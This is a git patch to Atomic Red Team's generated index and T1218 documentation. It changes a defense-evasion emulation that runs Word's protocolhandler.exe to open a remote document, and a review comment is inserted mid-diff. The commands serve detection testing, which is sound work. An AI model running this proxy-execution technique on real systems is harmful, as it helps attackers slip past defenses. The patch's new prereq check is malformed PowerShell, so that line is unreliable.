From c32fa3af4fbbb629ce48d6a76afe7f6f17f6f619 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 8 Apr 2021 17:48:04 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 14 +++++---------
 atomics/T1218/T1218.md | 6 +++---
 2 files changed, 8 insertions(+), 12 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b3d6619f..2170876a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -40004,10 +40004,6 @@ defense-evasion:
 supported_platforms:
 - windows
 input_arguments:
- microsoft_wordpath:
- description: path to office folder
- type: path
- default: C:\Program Files\Microsoft Office\root\Office16
 remote_url:
 description: url to document
 type: url
@@ -40018,8 +40014,8 @@ defense-evasion:
 must be provided
 '
- prereq_command: 'if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe")
- {exit 0} else {exit 1}
+ prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft
+ Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 '
 get_prereq_command: 'write-host "Install Microsoft Word or provide correct
@@ -40029,9 +40025,9 @@ defense-evasion:
 executor:
 name: command_prompt
 elevation_required: false
- command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
-
-'
+ command: |
+ FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
+ call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 - name: Microsoft.Workflow.Compiler.exe Payload Execution
 auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
 description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index c1f66294..5e7cdbfd 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
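Review bot: The new prereq_command in the second index.yaml hunk is malformed PowerShell — `(Resolve-Path "C:\Program Files*\...")` sits inside a double-quoted string with no `$(...)` subexpression, and its inner double quotes terminate the outer string, so Test-Path receives several bare arguments instead of one path and the check fails even when Word is installed. Once the quoting is fixed, `Resolve-Path` with that wildcard can also return more than one directory (both Program Files trees, for instance), which would again produce a path string Test-Path cannot use. The prereq is also inconsistent with the new executor in the third hunk, which locates protocolhandler.exe through the `App Paths\Winword.exe` registry value; resolving it the same way avoids both problems, e.g. `$p = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe').PATH` followed by `if (Test-Path (Join-Path $p 'protocolhandler.exe')) {exit 0} else {exit 1}`. In that executor the single-percent `%a`/`%b` loop variables are only valid when the lines run directly in an interactive cmd session; if the runner writes them to a .bat file first they must be `%%a`/`%%b`, which is worth confirming against the harness. The same text is rendered in the T1218.md hunks below, and both files are generated, so the fix belongs in the atomic definition they are built from rather than in either file here.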
@@ -192,7 +192,6 @@ Emulates attack via documents through protocol handler in Microsoft Office. On
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\root\Office16|
 | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx|
@@ -200,7 +199,8 @@ Emulates attack via documents through protocol handler in Microsoft Office. On
 ```cmd
-"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
+FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
+call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 ```
@@ -210,7 +210,7 @@ Emulates attack via documents through protocol handler in Microsoft Office. On
 ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}
+if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell